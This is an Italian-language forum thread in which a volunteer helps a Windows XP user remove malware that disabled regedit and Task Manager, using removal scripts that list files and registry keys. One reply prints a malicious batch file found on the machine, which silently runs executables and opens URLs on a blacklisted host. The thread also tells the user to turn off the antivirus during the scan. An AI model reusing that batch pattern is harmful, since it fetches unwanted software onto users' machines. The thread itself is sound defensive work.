Regedit E Task Manager Inattivi

[NICKBUBI]

Un saluto a tutti.A causa di qualche virus,regedit e task manager non sono piu' richiamabili.Mi ritrovo "Impossibile trovare il file".Uso XP e AVG 8.5.L'antivirus sembra aver sempre eliminato i virus,ma evidentemente il problema e' rimasto.Attraverso TuneUp Utilities sono riuscito ad accedere al registro,creando la chiave relativa all'abilitazione del task manager,mettendo come valore 0,ma non e' cambiato niente.Devo dire pero' che,a volte da start>esegui,digitando invece che taskmgr,tskmgr,quindi togliendo la a,viene fuori.Ma se lo richiamo dalla tastiera non c'e' niente da fare.Per quanto riguarda il regedit,che digiti regedit o regedt o aggiungendo anche 32,non mi da' errore,ma non viene fuori niente.Ho anche provato qualche utility come "taskmanagerfix" o "Enable taskmanager",ma ancora niente.Ho anche disabilitato il ripristino configurazione di sistema.Purtroppo non posso neanche agire in modalita' provvisoria,perche' non funziona.Se qualcuno puo' indicarmi una soluzione che non passi dalla formattazione,tante grazie.Ciao a tutti coloro che passano di qua.

[Deifobe]

ciao...
scarica SystemScan
disconnetti il pc da internet => disattiva l'antivirus => esegui systemscan => clicca su "Scan Now". Finita la scansione, riattiva l'antivirus

carica il rapporto che trovi sul desktop su megaupload e posta il link ottenuto.

nota: systemscan viene riconosciuto come infetto per il tipo di scansione effettuata (è un falso positivo). La procedura postata è sicura.

poi, come tentativo, scarica questa Utility ed attiva solo: Abilita task manager e regedit

[NICKBUBI]

Ciao.Devo ringraziarti perchè sei stata illuminante.Mi hai risolto il problema grazie alla tua utility.Comunque ho anche inviato il rapporto di systemscan.Così quando hai tempo puoi dargli un'occhiata.

Ecco l'indirizzo:http://www.megaupload.com/?d=85OHWQPQ
Anche se non so se è la sezione adatta,vorrei chiederti se conosci un modo per salvare tutti i programmi installati(magari su un disco esterno)prima di fare una formattazione,in modo da non dover poi reinstallare il tutto.Alcohol 120% potrebbe aiutarmi in questo?
Ti ringrazio ancora per l'aiuto che mi hai dato.
Ciao e a presto




P.S. Una curiosità!Questi simboli hanno un significato?
:x:_::_:*:_::_: )(:_:*:_:*:__::_:°FM°:_: )(:_:*:_:x:___

[Deifobe]

ciao,
esegui systemscan, clicca sul pulsante "Removal Script" e, nella finestra che si apre, copia/incolla questo script:

files to delete:
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\12089953.5126
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\0v7aX8eC.lnk
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\qi05C.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\k2g56.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\mzz4C.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\k6r41.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\wbk34.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\wbk32.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\wbk30.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\wbk2E.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\wbk2C.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\wbk2A.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\wbk28.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\wbk26.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\wbk24.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\wbk22.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\19665437.396
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\19104671.177
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\19586359.4453
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\tmp1BC.tmp
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\tmp1BC.avi
C:\WINDOWS\system32\drivers\^paargna.sys
C:\WINDOWS\system32\drivers\barhpuwv.sys

registry keys to delete:
HKLM\system\currentcontrolset\services\trfihwwc
HKLM\system\controlsetoo1\services\trfihwwc
HKLM\system\controlset003\services\trfihwwc

Clicca su "Proceed with removal" e il pc si riavviera' per eseguire lo script.
Al riavvio troveri la finestra di SystemScan con un messaggio (blu se lo script e' stato eseguito correttamente - rossa in caso contrario): controlla l'esito e rieseguilo se necessario.


Da Risorse del computer (o qualsiasi altra cartella) clicca su strumenti -> opzioni cartella -> visualizzazione
-> spunta: visualizza cartelle e file nascosti
-> togli la spunta a: nascondi i file protetti di sistema
-> togli la spunta a: nascondi le estensioni per i tipi di file conosciuti

analizza su Virustotal i file:
C:\WINDOWS\system32\datime32.dll e posta il link dell'analisi
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\eef9a46e.exe

inviami con un messaggio privato il file
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\bt32044.bat
(mi raccomando, non postare il link sul forum!)


per l'altra domanda su software, puoi rivolgerti in questa sezione

ciao


Edit: è un....portafortuna...

[NICKBUBI]

Ciao.Ecco i link per i 2 files:
http://www.virustotal.com/it/analisi...800341d450565b
http://www.virustotal.com/it/analisi...6a258f4d945857

Ho anche inviato il link di avenger(http://www.megaupload.com/?d=GP6YBGXM),perche' mi ha dato esito positivo,ma alla fine c'e' qualcosa che non sembra a posto.A te il giudizio.

Io,come sempre,ti ringrazio tantissimo.A Presto

[Deifobe]

il bat contiene:

codice:

@shift
%MYFILES%\AVSVideoTools-222688.exe
%MYFILES%\My-Tool.exe /s
start /wait http://volo.zapto.org/list1.php?id=avsvideotools
start /wait http://volo.zapto.org/list2.php?id=avsvideotools

lo vedo in blacklist, lo eliminiamo..
quindi, riesegui systemscan con questo script:

files to delete:
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\eef9a46e.exe
C:\WINDOWS\system32\datime32.dll
C:\DOCUME~1\DIBLAS~1\IMPOST~1\Temp\bt32044.bat

registry keys to delete:
HKLM\system\currentcontrolset\services\datime32
HKLM\system\controlset001\services\datime32
HKLM\system\controlset003\services\datime32
HKLM\system\currentcontrolset\enum\root\legacy_dat ime32
HKLM\system\controlset001\enum\root\legacy_datime3 2
HKLM\system\controlset003\enum\root\legacy_datime3 2
HKEY_LOCAL_MACHINE\system\controlset001\services\a gr8a77x
HKEY_LOCAL_MACHINE\system\controlset001\services\a yl1ukx7

posta un nuovo systemscan

mi fa sapere anche il pc come va?

puoi zippare la cartella c:\avenger e inviarmi anche questa con un messaggio privato se non ti dispiace? (ricorda: non sul forum )

ciao ......